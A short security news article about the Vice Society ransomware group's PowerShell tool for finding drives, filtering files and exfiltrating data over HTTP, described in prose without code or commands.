HQ/EMEAFind out how we can help your business
The Vice Society ransomware group and its affiliates have been using a new PowerShell-based tool to bypass detection while exfiltrating data from compromised networks. Based on reports, the threat actors used a built-in data exfiltration prompt that could negate the need to include external tools that security software or human-based security detection mechanism could flag as malicious.
These strategies could also conceal themselves within the general operating infrastructure, allowing the threat actors to submerse past security protocols.
Microsoft first identified the Vice Society ransomware group a couple of years ago.
Tech company giant Microsoft first tracked the Vice Society ransomware as DEV-0832. The group is a cybercriminal operation that prioritises extortion during its initial appearance in May 2021. In addition, the group has relied heavily on ransomware binaries available on underground markets.
December last year, a cybersecurity researcher revealed that the group used a ransomware variant called PolyVice to employ a hybrid encryption scheme that mixes asymmetric and symmetric encryption to ensure the file encryption process.
The researchers then recently discovered a PowerShell script that could identify mounted drives on the system and search through each root directory to aid data exfiltration over HTTP.
Furthermore, the malicious tool also creates an exclusion criteria mechanism that filters system files, backups, and folders, pointing to web browsers and security solutions from various well-known providers. Cybersecurity experts claimed that the PowerShell developer demonstrated high-level coding, making the tool sophisticated.
This discovery for data exfiltration shows that the actors still apply double extortion tactics for ransomware attacks. These attacks also remind organisations to employ more competent security protections and be knowledgeable of evolving threats.
Threat actors leverage the multi-processing and queuing to ensure their script will not consume most system resources. However, the script prioritises more than 10 KB files with file extensions and in directories that meet. Therefore, the script will not exfiltrate the information if it does not fit the targeted description.
